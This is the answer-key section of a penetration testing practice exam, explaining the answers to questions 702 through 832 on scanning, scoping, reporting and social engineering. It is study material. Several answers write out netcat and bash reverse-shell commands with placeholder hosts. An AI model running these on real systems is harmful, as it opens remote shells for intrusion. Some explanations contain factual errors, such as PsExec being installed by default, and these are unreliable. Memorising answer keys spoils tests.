1. C. This is an example of threat modeling. Using threat modeling, you determine the type of threat you want to emulate during the penetration test. Then you use the same tools, techniques, and approaches that type of threat would typically use.

Answer 702

1. D. The issue here is that the network uses a switch instead of a hub. The switch learns the MAC addresses of each network interface connected to each switch port. It only transmits frames to the specific port to which the destination network interface is attached. Because of this, your laptop never sees frames transmitted to other hosts on the network. While you could theoretically swap out the network switch for a hub, your client would probably not allow you to do this. The best option would be to connect the laptop to a mirror port on the switch. The mirror port contains copies of frames transmitted to all other switch ports. This allows your laptop to see frames addressed to other hosts. Before you do this, however, you need to make sure it is allowed under the rules of engagement for the test.

Answer 703

1. D. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, shredding the documents will make it much harder to recover the data from the reports.

Answer 704

1. A. Stealth scans currently aren’t considered as stealthy as they used to be. Most modern IDS/IPS devices can detect the unusually high frequency of RST packets on the network created during a stealth scan and take the appropriate action. For example, an IDS can generate an alert. An IPS can generate an alert and also block traffic from the scanning host.

Answer 705

1. D. Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.

Answer 706

1. C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 707

1. B. Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. In this scenario, the attacker is attempting to manipulate an HTML iframe with JavaScript code using a web browser.

Answer 708

1. A. Because this is a black box assessment, the testers should have no prior knowledge of the environment to be tested nor should they have special access to it. In essence, they should attack the client from the same perspective as a real attacker would. It is quite appropriate to pause testing during peak times to avoid disrupting their critical business operations. It’s also appropriate to communicate with the client only after the test is complete, especially on a black box assessment.

Answer 709

1. C. The –oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Answer 710

1. B. Before two organizations merge, it is common for penetration tests to be conducted to identify any security vulnerabilities that need to be addressed before their networks are connected. An objective-based assessment is designed to test whether information can remain secure. A compliance-based test is done to ensure that an organization remains in compliance with governmental regulations or corporate policies. A supply chain test involves testing an organization’s vendors.

Answer 711

1. A. The time windows when you can run vulnerability scans most effectively are heavily influenced by regulatory requirements, peak traffic times, and hardware constraints. The internal IT staff, on the other hand, will most likely not be involved with running vulnerability scans during a penetration test.

Answer 712

1. D. An SNMP brute-force attack attacks an IP address with SNMP queries to determine the SNMP read-only and read-write community strings (or passwords). It does this by trying every possible password. The master information base (MIB) database that is created by SNMP contains important information on every device on the network. If a tester can crack the password on SNMP, they may be able to control each networked device. This would allow changes to configurations to taking devices offline.

Answer 713

1. D. The rules of engagement (ROE) have been defined as needed in this scenario. ROE key elements include the following: * The timeline for the engagement and when testing can be conducted. * What locations, systems, applications, or other targets are included/excluded. Also, any special technical constraints should be addressed in the ROE. * Data handling requirements for any information gathered during the penetration testing. * What behaviors to expect. Any defensive behaviors such as shunning, blacklisting, or other active defenses may limit the value of a penetration test. * What resources will be committed to the testing. * Any legal concerns that should be addressed, including a summary of any regulatory concerns affecting the client organization, the penetration testing team, any remote locations, and any service providers who will be in scope. * When and how communications will occur. * Who to contact in case of particular events, such as evidence of compromises, accidental breach of ROE, critical vulnerabilities that have been discovered, or other events that merit immediate attention. * Who is allowed to contact the penetration testing team.

Answer 714

1. A. The Aircrack-ng utility can be used to discover wireless networks in range and then crack their encryption. This process is very fast for old WEP networks, harder but doable for WPA networks, and quite challenging for WPA2 networks.

Answer 715

1. A. The nmap utility is a widely used scanner. You can use it to scan a single host, such as the web server mentioned in this scenario, or even an entire network. To be a successful penetration tester, you should be familiar with the various ways in which nmap can be employed to discover information.

Answer 716

1. D. When referencing a value from an array, Python uses the following syntax: (*array\_name*[*position*]). In this example, the print command is being told to print the second value of the array named PrimeNumArray.

Answer 717

1. A. Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 718

1. A and E. While commenting an application’s source code is a best practice for programmers, it can also create security vulnerability because it provides an attacker (or penetration tester) who views the source code with extensive information about how the application works. Likewise, providing overly verbose error messages may be a best practice while programming the application, but leaving them in the released application can provide an attacker with valuable information.

Answer 719

1. A and E. In this scenario, the scope of this engagement is limited to the internal network only. Microsoft Office 365, Google Docs, and Microsoft Azure are all cloud-based services hosted by third parties and are therefore considered out-of-scope. The Active Directory users and the password policies that are defined within Group Policy would be considered in scope.

Answer 720

1. A. A TCP SYN flood (also known as a SYN flood) is a form of denial of service (DoS) attack in which a tester sends a succession of SYN requests to the target’s system in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. This exploits part of the normal TCP three-way handshake and consumes resources on the targeted server and renders it unresponsive.

Answer 721

1. B. This output was created by the Medusa utility. Medusa is a brute-force password cracking tool that sends one password after another to a given user account (administrator, in this case) in hopes of finding the right one.

Answer 722

1. B. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. A malicious insider is usually motivated by either revenge or financial gain. An organized crime actor is most likely motivated by financial gain. A script kiddie may have a variety of motivations, such as notoriety.

Answer 723

1. A and B. The scope of this engagement in this scenario is limited to the internal network infrastructure. Microsoft Office 365, Google Docs, and Microsoft Azure are all cloud-based services hosted by third parties and are therefore considered out of scope.

Answer 724

1. C. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. Compliance-based assessments are designed to test compliance with specific laws. In a black box test, the testers are not provided with access to or information about the target environment. A white box test is performed with full knowledge of the underlying network.

Answer 725

1. D. An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman’s terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 726

1. A and B. These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 727

1. C. Windows Management Instrumentation is an infrastructure provided by Microsoft for centrally managing Windows systems over a network connection.

Answer 728

1. B. Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap be installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is from 1–65,535. In this scenario, since you did not specify exactly how many ports to scan, it will scan the default of 1,000.

Answer 729

1. C and D. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, as is penetrating the organization’s facility or wheedling information out of a disgruntled employee. On the other hand, gathering information from the organization’s DNS registrar or reading job postings on the organization’s website are examples of passively gathering public information.

Answer 730

1. A. By masquerading as an upper-level manager, the penetration tester in this example utilized an appeal to authority to coerce the employee into divulging sensitive information.

Answer 731

1. B. Cookie manipulation is a client-side security misconfiguration that allows a script running within a browser to write data to a client-side cookie.

Answer 732

1. A. After a penetration test, it is critical that you undo everything you have done. For example, it is critical that you uninstall any tools or utilities you used to conduct exploits during the test.

Answer 733

1. C and E. File inclusion is an exploit that allows a tester to upload a file (usually containing malicious code) into a web application. The file could be local, or it could be located on a remote website. This is really a form of injection attack and just as with any injection attack, input validation on the part of the web application developer is the key to preventing it.

Answer 734

1. D. The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Answer 735

1. B. A nondisclosure agreement (NDA) is a legal contract that defines what confidential information can be shared and what cannot be shared. In most penetration testing agreements, the NDA specifies that the tester may not reveal the results of the test to anyone other than the client itself. A SOW is a formal document that defines the scope of the penetration test. An MSA defines terms that will govern future agreements. A purchase order is a binding agreement to make a purchase from a vendor.

Answer 736

1. E. When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section, including when you think the client should conduct follow-up penetration tests.

Answer 737

1. B. A noncredentialed vulnerability scan is performed without authenticating to the network. Because of this, a noncredentialed scan most closely approximates the perspective an external hacker.

Answer 738

1. B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important, but this scenario is asking for the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Answer 739

1. D. An SNMP brute-force attack attacks an IP address with SNMP queries to determine the SNMP read-only and read-write community strings (or passwords). It does this by trying every possible password. The master information base (MIB) database that is created by SNMP contains important information on every device on the network. If a tester can crack the password on SNMP, they may be able to control each networked device. This would allow changes to configurations to taking devices offline.

Answer 740

1. A. The FTP protocol does not encrypt data transfers between systems. This means authentication information as well as the data itself are exposed during transmission over the network. To remedy this, you should recommend that the client switch to FTPS instead of FTP. The FTPS protocol uses SSL or TLS to encrypt an FTP session since they encrypt data.

Answer 741

1. A. This is an example of a SQL injection attack. Instead of entering a password into the Password field, the tester inserts a SQL statement. If the web application in this example was poorly written, then it is possible that it would pull usernames and passwords for every user in the hypothetical database. The UNION SELECT statement is used to combine two unrelated SELECT queries to retrieve data from different database tables. A well-written application will use input validation to prevent SQL statements from being submitted within a user form. The same principles apply to HTML injection, command injection, and code injection attacks.

Answer 742

1. A. The Actions on Objectives stage of the attack also may include the theft of sensitive information, the unauthorized use of computing resources to engage in denial-of-service attacks, or the unauthorized modification/deletion of information. The attacker carries out their original intentions to violate the confidentiality, integrity, and/or availability of information or systems during the Actions on Objectives stage of the Cyber Kill Chain.

Answer 743

1. A. The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker with a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 744

1. A. In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. This is done by figuring out whether the likelihood is Low, Medium, or High and then doing the same for impact. The 0 to 9 scale is split into three parts: 0 to \<3 is Low, 3 to \<6 is Medium, and 6 to 9 is High.

Answer 745

1. C. In this scenario, the client has asked you to go beyond the agreed-upon test scope. This is an example of scope creep, and it is a common occurrence in IT contracting. In this scenario, you could respond in one of two ways. First, you could simply reject the request as being out-of-scope. Alternatively, you could ask the client to include the email servers in an addendum to the existing contract for an additional fee.

Answer 746

1. A. Running unattended installations over the network using the Preboot Execution Environment (PXE) could potentially result in authentication credentials being transferred as clear text. During the unattended install, a special file called the *answers file* is used to automate the installation process. If the answers file contains user account information to be created on the system during the install, that information is transferred as clear text.

Answer 747

1. B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person’s knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.

Answer 748

1. C. The device in this example is most likely a domain controller running on Windows Server. This is evidenced by the fact that the default DNS server, LDAP, and Kerberos ports are open on the system.

Answer 749

1. C. Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig --del will set the named service to not run at the current run level and will remove the persistence.

Answer 750

1. A. A master services agreement (MSA) defines general terms that will apply to multiple future agreements. Therefore, an MSA is essentially a contract that defines the terms under which future work will be completed. Specific projects governed by the MSA will be defined by a statement of work (SOW). The fact that the client wants to sign an MSA indicates that they probably want to use your firm for multiple engagements.

Answer 751

1. C. Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh * Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe * It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port]

Answer 752

1. A. To harden a server system, you should make sure only the services and applications necessary for its role are installed. The netstat command can be used to check for listening network ports on the system. This will reveal which services are running on the system.

Answer 753

1. B. Black box tests are sometimes called zero knowledge tests because they replicate what a typical external attacker would encounter. Testers are not provided with any access or information. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.

Answer 754

1. A and E. The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

Answer 755

1. C. The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Answer 756

1. A and B. In both a parameter pollution exploit and an insecure direct object reference exploit, the penetration tester modifies a parameter in an HTTP request to gain unauthorized access to information. For example, after authenticating to a web application, the tester could modify the /search?q= parameter in a URL to trick the application into supplying information that the user account shouldn’t be able to see.

Answer 757

1. B. This is an example of risk transference. Rather than avoid the risk by moving to a new location or mitigate the risk with seismic upgrades to the facility, the client has moved the risk to the insurance company.

Answer 758

1. E. When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section.

Answer 759

1. B. When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and correlated. The goal is to make it such that the client can read the aggregated data and understand what happened during the test and when.

Answer 760

1. D. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Answer 761

1. D. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing the report in an encrypted file on a file server would make it more difficult for the file to be stolen than the other options listed.

Answer 762

1. A. Dumpster diving occurs when an attacker searches through the target organization’s garbage looking for sensitive information.

Answer 763

1. A. In this scenario, you would need to receive the bands and frequencies used by the client’s wireless devices in order to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, but knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.

Answer 764

1. D. In this scenario, since you are trying to preform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.

Answer 765

1. E. The case structure is the best option presented to evaluate the user’s choice of multiple selections and run the appropriate set of commands as a result.

Answer 766

1. A. Certificate pinning associates a host with an X.509 certificate (or a public key) and then uses that association to make a trust decision. You use certificate pinning to help prevent man-in-the-middle attacks. When communicating over public networks, it is important to send and receive information securely.

Answer 767

1. C. The term *de-confliction* refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Answer 768

1. C and D. An internal penetration testing team may be too closely affiliated with the organization. For example, they may worry that a vulnerability discovered during a penetration test may reflect poorly on their team because they likely designed and continue to maintain the network being tested. This could cause a lack of objectivity when conducting penetration tests.

Answer 769

1. D. A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 770

1. D. The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Answer 771

1. D. Open source intelligence (OSINT) tools and techniques are those that go through publicly available information for organizational and technical details that might prove useful during the penetration test. OSINT is information that can be gathered easily. OSINT is often used to determine the organization’s footprint, which includes a listing of all of the systems, networks, and other technology that an organization has.

Answer 772

1. A. In this example, the nmap utility was used to run a TCP SYN scan. However, the –v option was included to increase the verboseness of the output.

Answer 773

1. D. The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.

Answer 774

1. A. The Simple Object Access Protocol (SOAP) is a messaging protocol specification that defines how structured information can be exchanged between web applications. SOAP project files can be created from Web Services Description Language (WSDL) files.

Answer 775

1. A and B. By default, an FTP server uses two ports: 20 and 21. Port 20 is used to transfer data between the FTP server and the FTP client. Port 21 is used to send commands between the FTP client and the FTP server.

Answer 776

1. C. Piggybacking attacks rely on following employees in through secured doors or other entrances. Higher-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

Answer 777

1. A. Mimikatz can be used to compromise Kerberos-based authentication systems, including generating “golden” and “silver” Kerberos tickets.

Answer 778

1. A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: * -l: Listen mode, for inbound connections * -p: Specifies a port to listen for a connection on * -e: Tells what program to run once the port is connected to (cmd.exe) * -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

Answer 779

1. B. In this example, the nmap utility was used to run a TCP connect scan. The nmap 10.0.0.1 –sT command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan.

Answer 780

1. B. Debuggers allow you to analyze an application as it executes. Typically, you can pause the execution of the application step by step or you can allow it to run until it reaches a certain point in the code. Doing this may allow you to identify a vulnerability that can be exploited as a part of a penetration test. However, you must have a strong background in programming or application testing to do this effectively.

Answer 781

1. A. In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 782

1. D. ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker’s Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.

Answer 783

1. C. In this scenario, the best approach would be to conduct an impact analysis with the client and determine their tolerance to impact. Is the information to be gained by using the vulnerability scanner worth the potential risk? For some organizations, the risk may be worth the benefit. For others, it may not. Either way, the penetration tester should not use the tool until the impact analysis is complete and the client is aware of the risks.

Answer 784

1. A. Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, a web server probably doesn’t need DNS, DHCP, printing, or email services running. These should be removed.

Answer 785

1. A. PsExec is a command-line utility that is installed by default on Windows systems that lets you interactively execute processes on other Windows systems.

Answer 786

1. C. Notice that the hostname of the device under Hostnames \> Name begins with *android*. From this, you can reasonably infer that the device is most likely a mobile phone or tablet running the Android operating system.

Answer 787

1. A. The Gramm-Leach-Bliley Act (GLBA) regulates how financial institutions handle customers’ personal information. For example, it requires companies to have a written information security plan in place that identifies processes and procedures intended to protect that information.

Answer 788

1. A and B. Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

Answer 789

1. C. This is an example of DNS cache poisoning. Instead of compromising a heavily protected DNS server, the penetration tester simply compromises the DNS cache on relatively less secure workstations. The net effect is the same. Malware is a common delivery vehicle for DNS cache poisoning exploits.

Answer 790

1. D. The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Answer 791

1. A. In this example, the nmap utility was used to scan port 80 on each of the 10 hosts listed in the range of IP addresses. This is done by running nmap with the –p 80 option.

Answer 792

1. C. The penetration tester in this scenario exploited the firewall administrator’s failure to modify the default account settings on the firewall device. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These default account settings are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.

Answer 793

1. D. Fence jumping occurs when an unauthorized person simply jumps over or cuts through a physical barrier designed to control access. In this scenario, the tester penetrated the physical fence barrier by cutting a hole in it.

Answer 794

1. A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: * bash -i \>& /dev/tcp//443 0\>&1 * Given the options, option A is the best option. Options B and C will not work because they are using the and not the , and option D is not correct because it is using the improper syntax.

Answer 795

1. C. When referencing a value from an array, Ruby uses the following syntax: *array\_name*[*position*]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

Answer 796

1. B. Additional authorization may be needed for many penetration tests, especially those that involve complex IT infrastructure. Third parties are often used to host systems such as software as a service (SaaS), platform as a service (PaaS), or infrastructure as a service (IaaS) cloud providers. A penetration test could impact these providers. This is why it is crucial to determine what/if third-party providers or partners may be in scope and to obtain authorization. If third parties are involved, you will also want to make sure that both the client and the third party are aware of any potential impacts from the penetration test.

Answer 797

1. A. In a gray box penetration test, the tester has partial knowledge of the target. This can be used to simulate a malicious insider attack conducted by an average employee. In a black box penetration test, the tester has no prior knowledge of the target. In a white box test, the tester has extensive knowledge of the target.

Answer 798

1. B. In this scenario, the client is asking the tester to conduct a goal-based assessment. Goals-based assessments are conducted for specific reasons. Some examples include validating a new security design, testing an application or service infrastructure before it enters production, or assessing the security of an organization. A premerger assessment is usually conducted on an organization prior to it merging with another. A compliance-based assessment is done to ensure that an organization is in compliance with government regulations or corporate policies. A supply chain assessment involves testing an organization’s vendors.

Answer 799

1. D. An *indicator of prior compromise* communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 800

1. B. One technique that can be used to establish persistence during a penetration test involving Linux systems is to schedule jobs using cron to run exploit scripts or start daemons. This ensures these jobs happen automatically without intervention once you have left the system.

Answer 801

1. A. An *indicator of prior compromise* communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 802

1. A and B. The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.

Answer 803

1. A. The –sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

Answer 804

1. C. Web scraping automatically extracts data and presents it in a format that a tester can easily make sense of. In this scenario, Python is being used as the scraping language compared to a powerful library called BeautifulSoup. BeautifulSoup is a Python package for parsing HTML and XML documents. It creates a parse tree for parsed pages that can be used to extract data from HTML, which is useful for web scraping. Beautiful Soup helps a tester pull particular content from a web page, remove the HTML markup, and save the information. It is a tool for web scraping that helps clean up and parse the documents that have been pulled down from the Web.

Answer 805

1. C. System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: * Application hardening * Operating system hardening * Server hardening * Database hardening * Network hardening

Answer 806

1. B and D. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used a USB key drop exploit, hoping that the user would insert the flash drive into their computer and install the malware it contains.

Answer 807

1. C and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain the trust of the target organization’s employees. In this scenario, the employees trusted the tester because emails appeared to be coming from another employee. The tester leveraged this trust to elicit sensitive information from those employees. This is sometimes called *business email compromise*.

Answer 808

1. B. In this scenario, the wireless network can be hardened by changing the default administrative username and password on the wireless controller. Lists of default usernames and passwords are readily available on the Internet and should not be used.

Answer 809

1. A. The chage command can be used on Linux systems to configure password aging for user accounts.

Answer 810

1. A. The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 811

1. B. When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the EC-Council’s CEH methodology.

Answer 812

1. D. The issue here is that the network uses a switch instead of a hub. The switch learns the MAC addresses of each network interface connected to each switch port. It only transmits frames to the specific port to which the destination network interface is attached. Because of this, your laptop never sees frames transmitted to any other host on the network.

Answer 813

1. D. Fingerprinting Organizations with Collected Archives (FOCA) is a utility that you can use to gather metadata from an organization’s documents, such as Word, PowerPoint, OpenOffice, and Adobe Reader files. FOCA searches popular search engines, such as Google and Bing, for these files and extracts any metadata they may contain.

Answer 814

1. C. PsExec is a tool designed to allow penetration testers to run programs on remote systems via SMB on port 445. That makes it an extremely useful tool. PsExec’s ability to run processes remotely requires that both the local and remote computers have file and print sharing (i.e., the Workstation and Server services) enabled and the default Admin$ share, which is a hidden share that maps to the \windows directory.

Answer 815

1. D and E. Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Answer 816

1. A. Network Mapper (nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the client did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Answer 817

1. A. A TCP SYN flood (also known as an SYN flood) is a form of denial-of-service (DDoS) attack in which a tester sends a succession of SYN requests to the target’s system in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. This exploits part of the normal TCP three-way handshake and consumes resources on the targeted server and renders it unresponsive.

Answer 818

1. C. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Answer 819

1. C. Bluejacking is when an attacker sends unsolicited messages over Bluetooth devices. Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, a hacker scans their surroundings with a Bluetooth-enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices.

Answer 820

1. A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 821

1. A. To harden a Linux-based server system, you should make sure a host-based firewall is running by enabling and configuring iptables. You should first close all network ports in the firewall and then open only those required by specific services running on the system.

Answer 822

1. D. In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

Answer 823

1. C. The penetration tester used shoulder surfing techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. For example, the tester may use shoulder surfing to gather usernames, passwords, email addresses, phone numbers, file server share names, and so on.

Answer 824

1. C. There are seven steps of the Cyber Kill Chain that enhanc visibility into an attack and enrich an analyst’s understanding of an adversary’s tactics, techniques, and procedures. The cyber kill is a methodology for understanding how an attacker will conduct the activities necessary to cause harm to an organization. An understanding of the Cyber Kill Chain will greatly assist an information security professional in establishing strong controls and countermeasures, which will serve to protect their organization’s assets. This question describes the Reconnaissance phase, the first stage of the Cyber Kill Chain. In this stage, the attacker is assessing the target from outside of the organization from both a technical and nontechnical perspective. In this stage, the attacker is working to determine which targets will return the most benefit for the resources expended in exploiting the target’s information systems. The attacker will be looking for information systems with few protections or exploitable vulnerabilities.

Answer 825

1. A. The \<= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Answer 826

1. A. Certificate pinning associates a host with an X.509 certificate (or a public key) and then uses that association to make a trust decision. You use certificate pinning to help prevent man-in-the-middle attacks. When communicating over public networks, it is important to send and receive information securely.

Answer 827

1. C. A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would be best to run a full scan on the network.

Answer 828

1. D. The term *de-escalation* refers to the process of communicating between the client and the tester to dial back the intensity of exploits or even stop them all together because of unsafe situations they may be causing.

Answer 829

1. C. Bluejacking is when an attacker sends unsolicited messages over Bluetooth devices. Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, a hacker scans their surroundings with a Bluetooth-enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices.

Answer 830

1. B. The amount of information uncovered in a penetration test is heavily dependent upon the rules of engagement and the type of assessment used. For example, a white box test usually provides more complete information than a black box test can. Likewise, if certain systems and devices are identified as out of scope, then any vulnerabilities they harbor will not be discovered. This language in the agreement is intended to protect you in the event a vulnerability is identified in an out-of-scope system after the test is complete.

Answer 831

1. A. The Common Attack Pattern Enumeration and Classification (CAPEC) list is a resource intended to help identify and document attacks and attack patterns. Users are allowed to search attacks by their mechanism or domain and then break down each attack by various attributes and prerequisites. CAPEC also suggests solutions and mitigations, which is useful in identifying controls when writing a penetration test report.

Answer 832

1. B. By flooding the router with bogus ICMP traffic, the tester makes it difficult for the router to service legitimate network requests. Because multiple hosts were used to conduct the stress test, this is an example of standard distributed denial of service (DDoS) attack.

Answer 833

